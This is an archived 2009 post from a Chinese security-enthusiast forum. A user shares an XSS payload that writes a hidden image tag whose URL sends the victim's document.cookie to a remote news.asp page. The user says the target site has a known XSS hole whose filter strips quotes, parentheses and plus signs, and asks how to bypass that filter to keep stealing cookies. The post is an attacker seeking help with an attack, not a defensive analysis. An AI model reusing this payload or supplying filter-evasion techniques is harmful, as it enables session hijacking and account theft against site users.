【3.A.S.T】网络安全爱好者's Archiver
【3.A.S.T】网络安全爱好者
»
有问必答
» 求教部分过滤的XSS脚本攻击解决办法
FirePan
发表于 2009-5-8 15:42
求教部分过滤的XSS脚本攻击解决办法
<!-- <script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script> -->
用以上语句获取COOKIE时,' () +被过滤了,是否有办法突破?(已知有XSS漏洞)
只用<img。。。。。。。。/>这段能否达到目的?与加上JS的语句有什么区别?
页:
[1]
Powered by
Discuz! Archiver
7.2 © 2001-2009
Comsenz Inc.
